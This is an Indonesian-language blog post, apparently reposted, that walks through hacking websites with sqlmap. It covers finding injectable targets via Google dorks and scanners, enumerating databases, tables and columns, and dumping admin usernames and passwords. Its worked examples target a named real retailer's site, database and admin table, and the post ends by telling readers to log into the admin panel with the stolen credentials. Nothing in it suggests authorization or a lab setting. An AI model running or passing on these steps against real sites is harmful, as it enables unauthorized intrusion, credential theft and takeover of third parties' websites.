oke langsung saja ke TKP
sebelum melakukan hacking jangan lupa siapkan target yang sudah vuln terhadap sql injection
bisa mencarinya dengan google dork atau menggunakan uniscan , owasp-zap, nikto , vega dll
download google dork disini
http://www.4shared.com/office/EST7GaQ2ba/dork_sql.html
jika sudah mendapatkan target
1. buka terminal
jika ingin melihat option pada sqlmap
ketik dengan perintah : sqlmap -h
2. untuk melakukan hacking berikan perintah :
sqlmap -u www.target.com/syntaxerrorr=2
CONTOH:
sqlmap -u www.skechers.com.hk/product.php?id=1152 --dbs
disini menandakan bahwa website tersebut vuln & jika ada pesan berikut tekan y lalu enter
di dalam kasus saya, saya mendapatkan 2 buah database & copy database tersebut untuk melanjutkan sql
3. lanjutkan lagi dengan perintah
untuk melihat isi tables
sqlmap -u www.target-anda.com/php?id=sekian -D database-target --tables
CONTOH:
sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb --tables
bisa langsung lompat untuk melihat columns dengan perintah
sqlmap -u www.target-anda.com/php?id=sekian -D database-target --columns
CONTOH :
sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb --columns
tetapi dalam kasus saya , saya lupa untuk menggunakan columns
hehehe
oke gak apa-apa kita lanjutkan saja
4. Disini saya sudah mendapatkan tabel serta daftar dari website tersebut
cari table atau columns yang berisikan nama user / admin / password atau apalah yang terhubung dengan username / password
5. saatnya mencari password & user admin
dengan perintah :
sqlmap -u www.target-anda.com/php?id=sekian -D database-target -T admin --dump
CONTOH:
sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb -T bz_admin --dump
6. cari halaman login admin website tersebut & masukan username & password yang telah kita dapatkan
sumber : http://rextor404.blogspot.co.id/2015/03/hack-website-menggunakan-sqlmap-di-kali.html
Share This Article
Tidak ada komentar:
Posting Komentar